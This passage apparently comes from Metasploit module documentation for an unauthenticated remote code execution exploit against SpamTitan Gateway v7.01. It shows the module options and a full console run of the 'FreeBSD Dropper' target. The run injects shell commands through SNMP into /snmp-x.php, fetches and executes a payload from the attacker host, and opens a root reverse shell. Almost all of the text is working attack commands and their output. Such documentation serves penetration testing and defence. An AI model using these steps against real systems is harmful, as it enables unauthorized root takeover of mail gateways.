FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
^C
Abort session 2? [y/N]  y

[*] 172.16.60.101 - Command shell session 2 closed.  Reason: User exit
```

</details>

<details>
<summary>SpamTitan Gateway v7.01 - target 2 (FreeBSD Dropper - x86)</summary>

```
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set target 2
target => 2
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options

Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RETRIES    1                yes       SNMP Retries
   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (UDP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to SpamTitan
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>
   VHOST                       no        HTTP server virtual host


Payload options (bsd/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   FreeBSD Dropper (x86)

msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Check if /snmp-x.php exists
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/EtQflZ
[*] Local IP: http://192.168.1.75:8080/EtQflZ
[*] Generated command stager: ["fetch -qo /tmp/uTJGnSFj http://172.16.60.1:8080/EtQflZ", "chmod +x /tmp/uTJGnSFj", "/tmp/uTJGnSFj", "rm -f /tmp/uTJGnSFj"]
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'fetch\ -qo\ /tmp/uTJGnSFj\ http://172.16.60.1:8080/EtQflZ&'#
[*] Send an SNMP Get-Request to trigger the payload
[*] Client 172.16.60.101 (fetch libfetch/2.0) requested /EtQflZ
[*] Sending payload to 172.16.60.101 (fetch libfetch/2.0)
[+] SNMP Get-Request response (status=noError): [1] 16656
[*] Command Stager progress -  50.00% done (54/108 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'chmod\ \+x\ /tmp/uTJGnSFj&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16685
[*] Command Stager progress -  70.37% done (76/108 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c '/tmp/uTJGnSFj&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16714
[*] Command shell session 3 opened (172.16.60.1:4444 -> 172.16.60.101:45568) at 2020-10-28 15:58:09 +0100
[*] Command Stager progress -  82.41% done (89/108 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'rm\ -f\ /tmp/uTJGnSFj&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16743
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
uname -a
FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
^C
Abort session 3? [y/N]  y

[*] 172.16.60.101 - Command shell session 3 closed.  Reason: User exit
```

</details>